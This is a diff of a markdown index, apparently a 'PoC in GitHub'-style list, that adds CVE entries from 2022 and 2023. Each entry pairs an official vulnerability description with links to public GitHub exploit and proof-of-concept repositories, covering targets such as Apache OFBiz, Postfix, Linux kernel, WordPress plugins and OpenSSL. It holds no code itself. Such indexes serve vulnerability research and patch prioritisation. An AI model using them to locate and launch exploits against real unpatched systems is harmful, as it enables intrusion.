+- [Chocapikk/CVE-2023-51467](https://github.com/Chocapikk/CVE-2023-51467)
+- [K3ysTr0K3R/CVE-2023-51467-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2023-51467-EXPLOIT)
+- [jakabakos/Apache-OFBiz-Authentication-Bypass](https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass)
+- [Subha-BOO7/Exploit_CVE-2023-51467](https://github.com/Subha-BOO7/Exploit_CVE-2023-51467)
+- [JaneMandy/CVE-2023-51467-Exploit](https://github.com/JaneMandy/CVE-2023-51467-Exploit)
+- [vulncheck-oss/cve-2023-51467](https://github.com/vulncheck-oss/cve-2023-51467)
+- [tw0point/BadBizness-CVE-2023-51467](https://github.com/tw0point/BadBizness-CVE-2023-51467)
+
+### CVE-2023-51518 (2024-02-27)
+
+Apache James prior to version 3.7.5 and 3.8.0 exposes a JMX endpoint on localhost subject to pre-authentication deserialisation of untrusted data.\nGiven a deserialisation gadjet, this could be leveraged as part of an exploit chain that could result in privilege escalation.\nNote that by default JMX endpoint is only bound locally.\n\nWe recommend users to:\n - Upgrade to a non-vulnerable Apache James version\n\n - Run Apache James isolated from other processes (docker - dedicated virtual machine)\n - If possible turn off JMX\n\n
+
+
+- [mbadanoiu/CVE-2023-51518](https://github.com/mbadanoiu/CVE-2023-51518)
+
+### CVE-2023-51764 (2023-12-24)
+
+Postfix through 3.8.5 allows SMTP smuggling unless configured with smtpd_data_restrictions=reject_unauth_pipelining and smtpd_discard_ehlo_keywords=chunking (or certain other options that exist in recent versions). Remote attackers can use a published exploitation technique to inject e-mail messages with a spoofed MAIL FROM address, allowing bypass of an SPF protection mechanism. This occurs because Postfix supports <LF>.<CR><LF> but some other popular e-mail servers do not. To prevent attack variants (by always disallowing <LF> without <CR>), a different solution is required, such as the smtpd_forbid_bare_newline=yes option with a Postfix minimum version of 3.5.23, 3.6.13, 3.7.9, 3.8.4, or 3.9.
+
+
+- [duy-31/CVE-2023-51764](https://github.com/duy-31/CVE-2023-51764)
+- [eeenvik1/CVE-2023-51764](https://github.com/eeenvik1/CVE-2023-51764)
+- [d4op/CVE-2023-51764-POC](https://github.com/d4op/CVE-2023-51764-POC)
+- [Double-q1015/CVE-2023-51764](https://github.com/Double-q1015/CVE-2023-51764)
+
+### CVE-2023-51800 (2024-02-29)
+
+Cross Site Scripting (XSS) vulnerability in School Fees Management System v.1.0 allows a remote attacker to execute arbitrary code via a crafted payload to the main_settings component in the phone, address, bank, acc_name, acc_number parameters, new_class and cname parameter, add_new_parent function in the name email parameters, new_term function in the tname parameter, and the edit_student function in the name parameter.
+
+
+- [geraldoalcantara/CVE-2023-51800](https://github.com/geraldoalcantara/CVE-2023-51800)
+
+### CVE-2023-51801 (2024-02-29)
+
+SQL Injection vulnerability in the Simple Student Attendance System v.1.0 allows a remote attacker to execute arbitrary code via a crafted payload to the id parameter in the student_form.php and the class_form.php pages.
+
+
+- [geraldoalcantara/CVE-2023-51801](https://github.com/geraldoalcantara/CVE-2023-51801)
+
+### CVE-2023-51802 (2024-02-29)
+
+Cross Site Scripting (XSS) vulnerability in the Simple Student Attendance System v.1.0 allows a remote attacker to execute arbitrary code via a crafted payload to the page or class_month parameter in the /php-attendance/attendance_report component.
+
+
+- [geraldoalcantara/CVE-2023-51802](https://github.com/geraldoalcantara/CVE-2023-51802)
+
+### CVE-2023-51810 (2024-01-16)
+
+SQL injection vulnerability in StackIdeas EasyDiscuss v.5.0.5 and fixed in v.5.0.10 allows a remote attacker to obtain sensitive information via a crafted request to the search parameter in the Users module.
+
+
+- [Pastea/CVE-2023-51810](https://github.com/Pastea/CVE-2023-51810)
+
+### CVE-2023-52160 (2024-02-22)
+
+The implementation of PEAP in wpa_supplicant through 2.10 allows authentication bypass. For a successful attack, wpa_supplicant must be configured to not verify the network's TLS certificate during Phase 1 authentication, and an eap_peap_decrypt vulnerability can then be abused to skip Phase 2 authentication. The attack vector is sending an EAP-TLV Success packet instead of starting Phase 2. This allows an adversary to impersonate Enterprise Wi-Fi networks.
+
+
+- [Helica-core/eap_pwn](https://github.com/Helica-core/eap_pwn)
+
+### CVE-2023-52251 (2024-01-25)
+
+An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.
+
+
+- [BobTheShoplifter/CVE-2023-52251-POC](https://github.com/BobTheShoplifter/CVE-2023-52251-POC)
+
+### CVE-2023-52654 (2024-05-09)
+
+In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring/af_unix: disable sending io_uring over sockets\n\nFile reference cycles have caused lots of problems for io_uring\nin the past, and it still doesn't work exactly right and races with\nunix_stream_read_generic(). The safest fix would be to completely\ndisallow sending io_uring files via sockets via SCM_RIGHT, so there\nare no possible cycles invloving registered files and thus rendering\nSCM accounting on the io_uring side unnecessary.
+
+
+- [FoxyProxys/CVE-2023-52654](https://github.com/FoxyProxys/CVE-2023-52654)
+
## 2022
### CVE-2022-0165 (2022-03-14)
@@ -48,6 +9096,13 @@
- [achuna33/CVE-2022-0265](https://github.com/achuna33/CVE-2022-0265)
+### CVE-2022-0316 (2023-01-23)
+
+The WeStand WordPress theme before 2.1, footysquare WordPress theme, aidreform WordPress theme, statfort WordPress theme, club-theme WordPress theme, kingclub-theme WordPress theme, spikes WordPress theme, spikes-black WordPress theme, soundblast WordPress theme, bolster WordPress theme from ChimpStudio and PixFill does not have any authorisation and upload validation in the lang_upload.php file, allowing any unauthenticated attacker to upload arbitrary files to the web server.
+
+
+- [KTN1990/CVE-2022-0316_wordpress_multiple_themes_exploit](https://github.com/KTN1990/CVE-2022-0316_wordpress_multiple_themes_exploit)
+
### CVE-2022-0320 (2022-02-01)
The Essential Addons for Elementor WordPress plugin before 5.0.5 does not validate and sanitise some template data before it them in include statements, which could allow unauthenticated attackers to perform Local File Inclusion attack and read arbitrary files on the server, this could also lead to RCE via user uploaded files or other LFI to RCE techniques.
@@ -68,6 +9123,7 @@
- [Puliczek/CVE-2022-0337-PoC-Google-Chrome-Microsoft-Edge-Opera](https://github.com/Puliczek/CVE-2022-0337-PoC-Google-Chrome-Microsoft-Edge-Opera)
+- [maldev866/ChExp-CVE-2022-0337-](https://github.com/maldev866/ChExp-CVE-2022-0337-)
- [zer0ne1/CVE-2022-0337-RePoC](https://github.com/zer0ne1/CVE-2022-0337-RePoC)
### CVE-2022-0412 (2022-02-28)
@@ -77,6 +9133,20 @@
- [TcherB31/CVE-2022-0412_Exploit](https://github.com/TcherB31/CVE-2022-0412_Exploit)
+### CVE-2022-0435 (2022-03-25)
+
+A stack overflow flaw was found in the Linux kernel's TIPC protocol functionality in the way a user sends a packet with malicious content where the number of domain member nodes is higher than the 64 allowed. This flaw allows a remote user to crash the system or possibly escalate their privileges if they have access to the TIPC network.
+
+
+- [wlswotmd/CVE-2022-0435](https://github.com/wlswotmd/CVE-2022-0435)
+
+### CVE-2022-0439 (2022-03-07)
+
+The Email Subscribers & Newsletters WordPress plugin before 5.3.2 does not correctly escape the `order` and `orderby` parameters to the `ajax_fetch_report_list` action, making it vulnerable to blind SQL injection attacks by users with roles as low as Subscriber. Further, it does not have any CSRF protection in place for the action, allowing an attacker to trick any logged in user to perform the action by clicking a link.
+
+
+- [RandomRobbieBF/CVE-2022-0439](https://github.com/RandomRobbieBF/CVE-2022-0439)
+
### CVE-2022-0441 (2022-03-07)
The MasterStudy LMS WordPress plugin before 2.7.6 does to validate some parameters given when registering a new account, allowing unauthenticated users to register as an admin
@@ -84,6 +9154,7 @@
- [biulove0x/CVE-2022-0441](https://github.com/biulove0x/CVE-2022-0441)
- [SDragon1205/cve-2022-0441](https://github.com/SDragon1205/cve-2022-0441)
+- [tegal1337/CVE-2022-0441](https://github.com/tegal1337/CVE-2022-0441)
- [kyukazamiqq/CVE-2022-0441](https://github.com/kyukazamiqq/CVE-2022-0441)
### CVE-2022-0482 (2022-03-09)
@@ -112,6 +9183,7 @@
- [bb33bb/CVE-2022-0492](https://github.com/bb33bb/CVE-2022-0492)
- [Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2022-0492](https://github.com/Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2022-0492)
- [yoeelingBin/CVE-2022-0492-Container-Escape](https://github.com/yoeelingBin/CVE-2022-0492-Container-Escape)
+- [T1erno/CVE-2022-0492-Docker-Breakout-Checker-and-PoC](https://github.com/T1erno/CVE-2022-0492-Docker-Breakout-Checker-and-PoC)
### CVE-2022-0529 (2022-02-09)
@@ -136,6 +9208,7 @@
- [0x7eTeam/CVE-2022-0543](https://github.com/0x7eTeam/CVE-2022-0543)
- [z92g/CVE-2022-0543](https://github.com/z92g/CVE-2022-0543)
- [JacobEbben/CVE-2022-0543](https://github.com/JacobEbben/CVE-2022-0543)
+- [SiennaSkies/redisHack](https://github.com/SiennaSkies/redisHack)
### CVE-2022-0591 (2022-03-21)
@@ -168,6 +9241,9 @@
- [BKreisel/CVE-2022-0739](https://github.com/BKreisel/CVE-2022-0739)
- [hadrian3689/wp_bookingpress_1.0.11](https://github.com/hadrian3689/wp_bookingpress_1.0.11)
- [G01d3nW01f/CVE-2022-0739](https://github.com/G01d3nW01f/CVE-2022-0739)
+- [viardant/CVE-2022-0739](https://github.com/viardant/CVE-2022-0739)
+- [ElGanz0/CVE-2022-0739](https://github.com/ElGanz0/CVE-2022-0739)
+- [lhamouche/Bash-exploit-for-CVE-2022-0739](https://github.com/lhamouche/Bash-exploit-for-CVE-2022-0739)
### CVE-2022-0778 (2022-03-15)
@@ -280,7 +9356,12 @@
- [qwert419/linux-](https://github.com/qwert419/linux-)
- [DataFox/CVE-2022-0847](https://github.com/DataFox/CVE-2022-0847)
- [pmihsan/Dirty-Pipe-CVE-2022-0847](https://github.com/pmihsan/Dirty-Pipe-CVE-2022-0847)
+- [ajith737/Dirty-Pipe-CVE-2022-0847-POCs](https://github.com/ajith737/Dirty-Pipe-CVE-2022-0847-POCs)
- [mutur4/CVE-2022-0847](https://github.com/mutur4/CVE-2022-0847)
+- [orsuprasad/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/orsuprasad/CVE-2022-0847-DirtyPipe-Exploits)
+- [JlSakuya/CVE-2022-0847-container-escape](https://github.com/JlSakuya/CVE-2022-0847-container-escape)
+- [jonathanbest7/cve-2022-0847](https://github.com/jonathanbest7/cve-2022-0847)
+- [0xeremus/dirty-pipe-poc](https://github.com/0xeremus/dirty-pipe-poc)
- [h4ckm310n/CVE-2022-0847-eBPF](https://github.com/h4ckm310n/CVE-2022-0847-eBPF)
- [joeymeech/CVE-2022-0847-Exploit-Implementation](https://github.com/joeymeech/CVE-2022-0847-Exploit-Implementation)
- [pashayogi/DirtyPipe](https://github.com/pashayogi/DirtyPipe)
@@ -327,6 +9408,7 @@
- [Bonfee/CVE-2022-0995](https://github.com/Bonfee/CVE-2022-0995)
+- [AndreevSemen/CVE-2022-0995](https://github.com/AndreevSemen/CVE-2022-0995)
- [1nzag/CVE-2022-0995](https://github.com/1nzag/CVE-2022-0995)
### CVE-2022-0997 (2022-05-16)
@@ -336,6 +9418,13 @@
- [henryreed/CVE-2022-0997](https://github.com/henryreed/CVE-2022-0997)
+### CVE-2022-1011 (2022-03-18)
+
+A use-after-free flaw was found in the Linux kernel’s FUSE filesystem in the way a user triggers write(). This flaw allows a local user to gain unauthorized access to data from the FUSE filesystem, resulting in privilege escalation.
+
+
+- [xkaneiki/CVE-2022-1011](https://github.com/xkaneiki/CVE-2022-1011)
+
### CVE-2022-1012 (2022-08-05)
A memory leak problem was found in the TCP source port generation algorithm in net/ipv4/tcp.c due to the small table perturb size. This flaw may allow an attacker to information leak and may cause a denial of service problem.
@@ -352,6 +9441,9 @@
- [zanezhub/CVE-2022-1015-1016](https://github.com/zanezhub/CVE-2022-1015-1016)
- [shuttterman/bob_kern_exp1](https://github.com/shuttterman/bob_kern_exp1)
- [ysanatomic/CVE-2022-1015](https://github.com/ysanatomic/CVE-2022-1015)
+- [wlswotmd/CVE-2022-1015](https://github.com/wlswotmd/CVE-2022-1015)
+- [delsploit/CVE-2022-1015](https://github.com/delsploit/CVE-2022-1015)
+- [pivik271/CVE-2022-1015](https://github.com/pivik271/CVE-2022-1015)
- [more-kohii/CVE-2022-1015](https://github.com/more-kohii/CVE-2022-1015)
- [0range1337/CVE-2022-1015](https://github.com/0range1337/CVE-2022-1015)
@@ -360,6 +9452,7 @@
Kyocera multifunction printers running vulnerable versions of Net View unintentionally expose sensitive user information, including usernames and passwords, through an insufficiently protected address book export function.
+- [ac3lives/kyocera-cve-2022-1026](https://github.com/ac3lives/kyocera-cve-2022-1026)
- [flamebarke/nmap-printer-nse-scripts](https://github.com/flamebarke/nmap-printer-nse-scripts)
- [r0lh/kygocera](https://github.com/r0lh/kygocera)
@@ -372,6 +9465,7 @@
- [jam620/Sophos-Vulnerability](https://github.com/jam620/Sophos-Vulnerability)
- [Keith-amateur/cve-2022-1040](https://github.com/Keith-amateur/cve-2022-1040)
- [jackson5sec/CVE-2022-1040](https://github.com/jackson5sec/CVE-2022-1040)
+- [michealadams30/CVE-2022-1040](https://github.com/michealadams30/CVE-2022-1040)
- [Cyb3rEnthusiast/CVE-2022-1040](https://github.com/Cyb3rEnthusiast/CVE-2022-1040)
- [xMr110/CVE-2022-1040](https://github.com/xMr110/CVE-2022-1040)
@@ -432,6 +9526,13 @@
- [RandomRobbieBF/CVE-2022-1203](https://github.com/RandomRobbieBF/CVE-2022-1203)
+### CVE-2022-1227 (2022-04-29)
+
+A privilege escalation flaw was found in Podman. This flaw allows an attacker to publish a malicious image to a public registry. Once this image is downloaded by a potential victim, the vulnerability is triggered after a user runs the 'podman top' command. This action gives the attacker access to the host filesystem, leading to information disclosure or denial of service.
+
+
+- [iridium-soda/CVE-2022-1227_Exploit](https://github.com/iridium-soda/CVE-2022-1227_Exploit)
+
### CVE-2022-1292 (2022-05-03)
The c_rehash script does not properly sanitise shell metacharacters to prevent command injection. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2). Fixed in OpenSSL 1.1.1o (Affected 1.1.1-1.1.1n). Fixed in OpenSSL 1.0.2ze (Affected 1.0.2-1.0.2zd).
@@ -451,6 +9552,7 @@
- [AkuCyberSec/CVE-2022-1329-WordPress-Elementor-3.6.0-3.6.1-3.6.2-Remote-Code-Execution-Exploit](https://github.com/AkuCyberSec/CVE-2022-1329-WordPress-Elementor-3.6.0-3.6.1-3.6.2-Remote-Code-Execution-Exploit)
- [mcdulltii/CVE-2022-1329](https://github.com/mcdulltii/CVE-2022-1329)
- [Grazee/CVE-2022-1329-WordPress-Elementor-RCE](https://github.com/Grazee/CVE-2022-1329-WordPress-Elementor-RCE)
+- [dexit/CVE-2022-1329](https://github.com/dexit/CVE-2022-1329)
- [phanthibichtram12/CVE-2022-1329](https://github.com/phanthibichtram12/CVE-2022-1329)
### CVE-2022-1364 (2022-07-26)
@@ -465,6 +9567,8 @@
The Fusion Builder WordPress plugin before 3.6.2, used in the Avada theme, does not validate a parameter in its forms which could be used to initiate arbitrary HTTP requests. The data returned is then reflected back in the application's response. This could be used to interact with hosts on the server's local network bypassing firewalls and access control measures.
+- [ardzz/CVE-2022-1386](https://github.com/ardzz/CVE-2022-1386)
+- [im-hanzou/fubucker](https://github.com/im-hanzou/fubucker)
- [zycoder0day/CVE-2022-1386-Mass_Vulnerability](https://github.com/zycoder0day/CVE-2022-1386-Mass_Vulnerability)
- [imhunterand/CVE-2022-1386](https://github.com/imhunterand/CVE-2022-1386)
- [satyasai1460/CVE-2022-1386](https://github.com/satyasai1460/CVE-2022-1386)
@@ -531,6 +9635,7 @@
- [M4fiaB0y/CVE-2022-1388](https://github.com/M4fiaB0y/CVE-2022-1388)
- [devengpk/CVE-2022-1388](https://github.com/devengpk/CVE-2022-1388)
- [vaelwolf/CVE-2022-1388](https://github.com/vaelwolf/CVE-2022-1388)
+- [j-baines/tippa-my-tongue](https://github.com/j-baines/tippa-my-tongue)
- [SudeepaShiranthaka/F5-BIG-IP-Remote-Code-Execution-Vulnerability-CVE-2022-1388-A-Case-Study](https://github.com/SudeepaShiranthaka/F5-BIG-IP-Remote-Code-Execution-Vulnerability-CVE-2022-1388-A-Case-Study)
- [battleofthebots/refresh](https://github.com/battleofthebots/refresh)
- [nvk0x/CVE-2022-1388-exploit](https://github.com/nvk0x/CVE-2022-1388-exploit)
@@ -556,6 +9661,7 @@
SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization. We recommend upgrading to version 2.0 and beyond.\n
+- [1fabunicorn/SnakeYAML-CVE-2022-1471-POC](https://github.com/1fabunicorn/SnakeYAML-CVE-2022-1471-POC)
- [falconkei/snakeyaml_cve_poc](https://github.com/falconkei/snakeyaml_cve_poc)
### CVE-2022-1565 (2022-07-18)
@@ -587,6 +9693,7 @@
- [savior-only/CVE-2022-1609](https://github.com/savior-only/CVE-2022-1609)
- [0xSojalSec/CVE-2022-1609](https://github.com/0xSojalSec/CVE-2022-1609)
- [0xSojalSec/-CVE-2022-1609](https://github.com/0xSojalSec/-CVE-2022-1609)
+- [w4r3s/cve-2022-1609-exploit](https://github.com/w4r3s/cve-2022-1609-exploit)
### CVE-2022-1679 (2022-05-16)
@@ -616,6 +9723,13 @@
### CVE-2022-1972
- [randorisec/CVE-2022-1972-infoleak-PoC](https://github.com/randorisec/CVE-2022-1972-infoleak-PoC)
+### CVE-2022-2078 (2022-06-30)
+
+A vulnerability was found in the Linux kernel's nft_set_desc_concat_parse() function .This flaw allows an attacker to trigger a buffer overflow via nft_set_desc_concat_parse() , causing a denial of service and possibly to run code.
+
+
+- [delsploit/CVE-2022-2078](https://github.com/delsploit/CVE-2022-2078)
+
### CVE-2022-2097 (2022-07-05)
AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).
@@ -641,6 +9755,7 @@
- [Malwareman007/CVE-2022-2274](https://github.com/Malwareman007/CVE-2022-2274)
- [EkamSinghWalia/OpenSSL-Vulnerability-Detection-Script](https://github.com/EkamSinghWalia/OpenSSL-Vulnerability-Detection-Script)
+- [DesmondSanctity/CVE-2022-2274](https://github.com/DesmondSanctity/CVE-2022-2274)
### CVE-2022-2333 (2022-09-13)
@@ -692,6 +9807,7 @@
- [PolymorphicOpcode/CVE-2022-2588](https://github.com/PolymorphicOpcode/CVE-2022-2588)
- [BassamGraini/CVE-2022-2588](https://github.com/BassamGraini/CVE-2022-2588)
- [veritas501/CVE-2022-2588](https://github.com/veritas501/CVE-2022-2588)
+- [dom4570/CVE-2022-2588](https://github.com/dom4570/CVE-2022-2588)
### CVE-2022-2602 (2024-01-08)
@@ -700,6 +9816,7 @@
- [LukeGix/CVE-2022-2602](https://github.com/LukeGix/CVE-2022-2602)
- [kiks7/CVE-2022-2602-Kernel-Exploit](https://github.com/kiks7/CVE-2022-2602-Kernel-Exploit)
+- [th3-5had0w/CVE-2022-2602-Study](https://github.com/th3-5had0w/CVE-2022-2602-Study)
### CVE-2022-2639 (2022-09-01)
@@ -735,6 +9852,13 @@
- [UgOrange/CVE-2022-3172](https://github.com/UgOrange/CVE-2022-3172)
+### CVE-2022-3317 (2022-11-01)
+
+Insufficient validation of untrusted input in Intents in Google Chrome on Android prior to 106.0.5249.62 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low)
+
+
+- [hfh86/CVE-2022-3317](https://github.com/hfh86/CVE-2022-3317)
+
### CVE-2022-3328 (2024-01-08)
Race condition in snap-confine's must_mkdir_and_open_with_perms()
@@ -770,6 +9894,13 @@
- [thehackingverse/CVE-2022-3546](https://github.com/thehackingverse/CVE-2022-3546)
+### CVE-2022-3552 (2022-10-17)
+
+Unrestricted Upload of File with Dangerous Type in GitHub repository boxbilling/boxbilling prior to 0.0.1.
+
+
+- [kabir0x23/CVE-2022-3552](https://github.com/kabir0x23/CVE-2022-3552)
+
### CVE-2022-3564 (2022-10-17)
A vulnerability classified as critical was found in Linux Kernel. Affected by this vulnerability is the function l2cap_reassemble_sdu of the file net/bluetooth/l2cap_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211087.
@@ -777,6 +9908,13 @@
- [Trinadh465/linux-4.1.15_CVE-2022-3564](https://github.com/Trinadh465/linux-4.1.15_CVE-2022-3564)
+### CVE-2022-3590 (2022-12-14)
+
+WordPress is affected by an unauthenticated blind SSRF in the pingback feature. Because of a TOCTOU race condition between the validation checks and the HTTP request, attackers can reach internal hosts that are explicitly forbidden.
+
+
+- [hxlxmjxbbxs/CVE-2022-3590-WordPress-Vulnerability-Scanner](https://github.com/hxlxmjxbbxs/CVE-2022-3590-WordPress-Vulnerability-Scanner)
+
### CVE-2022-3602 (2022-11-01)
A buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking. Note that this occurs after certificate chain signature verification and requires either a CA to have signed the malicious certificate or for the application to continue certificate verification despite failure to construct a path to a trusted issuer. An attacker can craft a malicious email address to overflow four attacker-controlled bytes on the stack. This buffer overflow could result in a crash (causing a denial of service) or potentially remote code execution. Many platforms implement stack overflow protections which would mitigate against the risk of remote code execution. The risk may be further mitigated based on stack layout for any given platform/compiler. Pre-announcements of CVE-2022-3602 described this issue as CRITICAL. Further analysis based on some of the mitigating factors described above have led this to be downgraded to HIGH. Users are still encouraged to upgrade to a new version as soon as possible. In a TLS client, this can be triggered by connecting to a malicious server. In a TLS server, this can be triggered if the server requests client authentication and a malicious client connects. Fixed in OpenSSL 3.0.7 (Affected 3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6).
@@ -791,6 +9929,13 @@
- [corelight/CVE-2022-3602](https://github.com/corelight/CVE-2022-3602)
- [cybersecurityworks553/CVE-2022-3602-and-CVE-2022-3786](https://github.com/cybersecurityworks553/CVE-2022-3602-and-CVE-2022-3786)
+### CVE-2022-3656 (2022-11-01)
+
+Insufficient data validation in File System in Google Chrome prior to 107.0.5304.62 allowed a remote attacker to bypass file system restrictions via a crafted HTML page. (Chromium security severity: Medium)
+
+
+- [momika233/CVE-2022-3656](https://github.com/momika233/CVE-2022-3656)
+
### CVE-2022-3699 (2023-10-24)
\nA privilege escalation vulnerability was reported in the Lenovo HardwareScanPlugin prior to version 1.3.1.2 and Lenovo Diagnostics prior to version 4.45\n\n\n\n that could allow a local user to execute code with elevated privileges.
@@ -799,6 +9944,13 @@
- [alfarom256/CVE-2022-3699](https://github.com/alfarom256/CVE-2022-3699)
- [estimated1337/lenovo_exec](https://github.com/estimated1337/lenovo_exec)
+### CVE-2022-3786 (2022-11-01)
+
+A buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking. Note that this occurs after certificate chain signature verification and requires either a CA to have signed a malicious certificate or for an application to continue certificate verification despite failure to construct a path to a trusted issuer. An attacker can craft a malicious email address in a certificate to overflow an arbitrary number of bytes containing the `.' character (decimal 46) on the stack. This buffer overflow could result in a crash (causing a denial of service). In a TLS client, this can be triggered by connecting to a malicious server. In a TLS server, this can be triggered if the server requests client authentication and a malicious client connects.\n\n
+
+
+- [WhatTheFuzz/openssl-fuzz](https://github.com/WhatTheFuzz/openssl-fuzz)
+
### CVE-2022-3904 (2023-01-16)
The MonsterInsights WordPress plugin before 8.9.1 does not sanitize or escape page titles in the top posts/pages section, allowing an unauthenticated attacker to inject arbitrary web scripts into the titles by spoofing requests to google analytics.
@@ -806,6 +9958,13 @@
- [RandomRobbieBF/CVE-2022-3904](https://github.com/RandomRobbieBF/CVE-2022-3904)
+### CVE-2022-3910 (2022-11-22)
+
+Use After Free vulnerability in Linux Kernel allows Privilege Escalation. An improper Update of Reference Count in io_uring leads to Use-After-Free and Local Privilege Escalation.\nWhen io_msg_ring was invoked with a fixed file, it called io_fput_file() which improperly decreased its reference count (leading to Use-After-Free and Local Privilege Escalation). Fixed files are permanently registered to the ring, and should not be put separately.\n\nWe recommend upgrading past commit https://github.com/torvalds/linux/commit/fc7222c3a9f56271fba02aabbfbae999042f1679 https://github.com/torvalds/linux/commit/fc7222c3a9f56271fba02aabbfbae999042f1679 \n
+
+
+- [veritas501/CVE-2022-3910](https://github.com/veritas501/CVE-2022-3910)
+
### CVE-2022-3942 (2022-11-11)
A vulnerability was found in SourceCodester Sanitization Management System and classified as problematic. This issue affects some unknown processing of the file php-sms/?p=request_quote. The manipulation leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-213449 was assigned to this vulnerability.
@@ -856,6 +10015,13 @@
- [im-hanzou/INPGer](https://github.com/im-hanzou/INPGer)
+### CVE-2022-4096 (2022-11-21)
+
+Server-Side Request Forgery (SSRF) in GitHub repository appsmithorg/appsmith prior to 1.8.2.
+
+
+- [aminetitrofine/CVE-2022-4096](https://github.com/aminetitrofine/CVE-2022-4096)
+
### CVE-2022-4262 (2022-12-02)
Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
@@ -865,11 +10031,27 @@
- [mistymntncop/CVE-2022-4262](https://github.com/mistymntncop/CVE-2022-4262)
- [quangnh89/CVE-2022-4262](https://github.com/quangnh89/CVE-2022-4262)
+### CVE-2022-4304 (2023-02-08)
+
+A timing based side channel exists in the OpenSSL RSA Decryption implementation\nwhich could be sufficient to recover a plaintext across a network in a\nBleichenbacher style attack. To achieve a successful decryption an attacker\nwould have to be able to send a very large number of trial messages for\ndecryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5,\nRSA-OEAP and RSASVE.\n\nFor example, in a TLS connection, RSA is commonly used by a client to send an\nencrypted pre-master secret to the server. An attacker that had observed a\ngenuine connection between a client and a server could use this flaw to send\ntrial messages to the server and record the time taken to process them. After a\nsufficiently large number of messages the attacker could recover the pre-master\nsecret used for the original connection and thus be able to decrypt the\napplication data sent over that connection.\n\n
+
+
+- [Trinadh465/Openssl-1.1.1g_CVE-2022-4304](https://github.com/Trinadh465/Openssl-1.1.1g_CVE-2022-4304)
+
+### CVE-2022-4395 (2023-01-30)
+
+The Membership For WooCommerce WordPress plugin before 2.1.7 does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as malicious PHP code, and achieve RCE.
+
+
+- [MrG3P5/CVE-2022-4395](https://github.com/MrG3P5/CVE-2022-4395)
+
### CVE-2022-4510 (2023-01-25)
\nA path traversal vulnerability was identified in ReFirm Labs binwalk from version 2.1.2b through 2.3.3 included. By crafting a malicious PFS filesystem file, an attacker can get binwalk's PFS extractor to extract files at arbitrary locations when binwalk is run in extraction mode (-e option). Remote code execution can be achieved by building a PFS filesystem that, upon extraction, would extract a malicious binwalk module into the folder .config/binwalk/plugins.\n This vulnerability is associated with program files src/binwalk/plugins/unpfs.py.\n\nThis issue affects binwalk from 2.1.2b through 2.3.3 included.\n\n
+- [electr0sm0g/CVE-2022-4510](https://github.com/electr0sm0g/CVE-2022-4510)
+- [adhikara13/CVE-2022-4510-WalkingPath](https://github.com/adhikara13/CVE-2022-4510-WalkingPath)
- [Kalagious/BadPfs-CVE-2022-4510](https://github.com/Kalagious/BadPfs-CVE-2022-4510)
### CVE-2022-4543 (2023-01-11)
@@ -887,12 +10069,43 @@
- [Phamchie/CVE-2022-4611](https://github.com/Phamchie/CVE-2022-4611)
- [fgsoftware1/CVE-2022-4611](https://github.com/fgsoftware1/CVE-2022-4611)
+### CVE-2022-4616 (2023-01-12)
+
+The webserver in Delta DX-3021 versions prior to 1.24 is vulnerable to \ncommand injection through the network diagnosis page. This vulnerability\n could allow a remote unauthenticated user to add files, delete files, \nand change file permissions.\n\n
+
+
+- [ahanel13/CVE-2022-4616-POC](https://github.com/ahanel13/CVE-2022-4616-POC)
+
+### CVE-2022-4896 (2023-09-12)
+
+Cyber Control, in its 1.650 version, is affected by a vulnerability in the generation on the server of pop-up windows with the messages "PNTMEDIDAS", "PEDIR", "HAYDISCOA" or "SPOOLER". A complete denial of service can be achieved by sending multiple requests simultaneously on a core.
+
+
+- [sapellaniz/CVE-2022-4896](https://github.com/sapellaniz/CVE-2022-4896)
+
+### CVE-2022-4939 (2023-04-05)
+
+THe WCFM Membership plugin for WordPress is vulnerable to privilege escalation in versions up to, and including 2.10.0, due to a missing capability check on the wp_ajax_nopriv_wcfm_ajax_controller AJAX action that controls membership settings. This makes it possible for unauthenticated attackers to modify the membership registration form in a way that allows them to set the role for registration to that of any user including administrators. Once configured, the attacker can then register as an administrator.
+
+
+- [BaconCriCRi/PoC-CVE-2022-4939-](https://github.com/BaconCriCRi/PoC-CVE-2022-4939-)
+
+### CVE-2022-4944 (2023-04-22)
+
+Eine problematische Schwachstelle wurde in kalcaddle KodExplorer bis 4.49 entdeckt. Davon betroffen ist unbekannter Code. Durch Manipulation mit unbekannten Daten kann eine cross-site request forgery-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 4.50 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen.
+
+
